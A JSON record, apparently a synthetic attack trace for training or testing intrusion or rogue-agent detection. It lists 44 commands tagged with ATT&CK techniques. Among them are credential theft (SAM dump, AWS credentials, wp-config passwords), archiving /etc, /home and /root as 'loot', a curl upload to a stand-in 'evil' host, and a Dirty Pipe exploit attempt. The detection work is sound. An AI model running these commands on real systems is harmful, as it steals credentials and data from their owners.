{
  "sophistication": 0.893,
  "profile": "careful_agent",
  "length": 44,
  "total_time": 293.5,
  "steps": [
    {
      "t": 27.3,
      "cmd": "lsadump::sam",
      "ttp": "T1003",
      "recon": 0,
      "priv_esc": 0,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 32.8,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 1,
      "priv_esc": 0,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 35.9,
      "cmd": "last -n 5",
      "ttp": "T1049",
      "recon": 2,
      "priv_esc": 0,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 46.9,
      "cmd": "uname -a",
      "ttp": "T1082",
      "recon": 3,
      "priv_esc": 0,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 54.9,
      "cmd": "sudo su -",
      "ttp": "T1068",
      "recon": 3,
      "priv_esc": 1,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 63.3,
      "cmd": "find / -perm -4000 2>/dev/null",
      "ttp": "T1068",
      "recon": 3,
      "priv_esc": 2,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 65.3,
      "cmd": "ss -tuln",
      "ttp": "T1049",
      "recon": 4,
      "priv_esc": 2,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 69.2,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 5,
      "priv_esc": 2,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 81.2,
      "cmd": "cat /etc/os-release",
      "ttp": "T1049",
      "recon": 6,
      "priv_esc": 2,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 85.5,
      "cmd": "sudo -l",
      "ttp": "T1068",
      "recon": 6,
      "priv_esc": 3,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 92.5,
      "cmd": "arp -a",
      "ttp": "T1049",
      "recon": 7,
      "priv_esc": 3,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 97.9,
      "cmd": "sudo -l",
      "ttp": "T1068",
      "recon": 7,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 109.1,
      "cmd": "ip route",
      "ttp": "T1049",
      "recon": 8,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 111.2,
      "cmd": "cat /etc/os-release",
      "ttp": "T1049",
      "recon": 9,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 116.4,
      "cmd": "ls -la /home",
      "ttp": "T1049",
      "recon": 10,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 118.4,
      "cmd": "arp -a",
      "ttp": "T1049",
      "recon": 11,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 125.5,
      "cmd": "ls -la /home",
      "ttp": "T1049",
      "recon": 12,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 133.5,
      "cmd": "curl -F 'file=@/tmp/loot.tar' http://evil/recv",
      "ttp": "T1041",
      "recon": 12,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 135.5,
      "cmd": "cat /etc/sudoers",
      "ttp": "T1068",
      "recon": 12,
      "priv_esc": 5,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 142.4,
      "cmd": "ss -tuln",
      "ttp": "T1049",
      "recon": 13,
      "priv_esc": 5,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 145.7,
      "cmd": "last -n 5",
      "ttp": "T1049",
      "recon": 14,
      "priv_esc": 5,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 147.7,
      "cmd": "cat /etc/os-release",
      "ttp": "T1049",
      "recon": 15,
      "priv_esc": 5,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 151.0,
      "cmd": "cat /etc/sudoers",
      "ttp": "T1068",
      "recon": 15,
      "priv_esc": 6,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 153.0,
      "cmd": "ip addr",
      "ttp": "T1049",
      "recon": 16,
      "priv_esc": 6,
      "cred_access": 1,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 156.2,
      "cmd": "grep -i password /var/www/html/wp-config.php",
      "ttp": "T1003",
      "recon": 16,
      "priv_esc": 6,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 159.2,
      "cmd": "tar czf /tmp/loot.tar /etc /home /root",
      "ttp": "T1041",
      "recon": 16,
      "priv_esc": 6,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 167.4,
      "cmd": "kernel exploit attempt (dirtypipe)",
      "ttp": "T1068",
      "recon": 16,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 176.4,
      "cmd": "uname -a",
      "ttp": "T1082",
      "recon": 17,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 182.1,
      "cmd": "id",
      "ttp": "T1049",
      "recon": 18,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 184.1,
      "cmd": "pkexec --version",
      "ttp": "T1068",
      "recon": 18,
      "priv_esc": 8,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 200.4,
      "cmd": "arp -a",
      "ttp": "T1049",
      "recon": 19,
      "priv_esc": 8,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 207.5,
      "cmd": "last -n 5",
      "ttp": "T1049",
      "recon": 20,
      "priv_esc": 8,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 209.5,
      "cmd": "cat /etc/passwd",
      "ttp": "T1049",
      "recon": 21,
      "priv_esc": 8,
      "cred_access": 2,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 219.9,
      "cmd": "cat /root/.aws/credentials",
      "ttp": "T1003",
      "recon": 21,
      "priv_esc": 8,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 221.9,
      "cmd": "uname -a",
      "ttp": "T1082",
      "recon": 22,
      "priv_esc": 8,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 227.1,
      "cmd": "kernel exploit attempt (dirtypipe)",
      "ttp": "T1068",
      "recon": 22,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 231.0,
      "cmd": "last -n 5",
      "ttp": "T1049",
      "recon": 23,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 234.3,
      "cmd": "id",
      "ttp": "T1049",
      "recon": 24,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 247.7,
      "cmd": "tar czf /tmp/loot.tar /etc /home /root",
      "ttp": "T1041",
      "recon": 24,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 3,
      "profile": "careful_agent"
    },
    {
      "t": 251.2,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 25,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 3,
      "profile": "careful_agent"
    },
    {
      "t": 253.2,
      "cmd": "ip route",
      "ttp": "T1049",
      "recon": 26,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 3,
      "profile": "careful_agent"
    },
    {
      "t": 271.0,
      "cmd": "find / -name '*.conf' 2>/dev/null | head -5",
      "ttp": "T1049",
      "recon": 27,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 3,
      "profile": "careful_agent"
    },
    {
      "t": 286.5,
      "cmd": "tar czf /tmp/loot.tar /etc /home /root",
      "ttp": "T1041",
      "recon": 27,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 4,
      "profile": "careful_agent"
    },
    {
      "t": 293.5,
      "cmd": "last -n 5",
      "ttp": "T1049",
      "recon": 28,
      "priv_esc": 9,
      "cred_access": 3,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 4,
      "profile": "careful_agent"
    }
  ],
  "id": "trace_00554"
}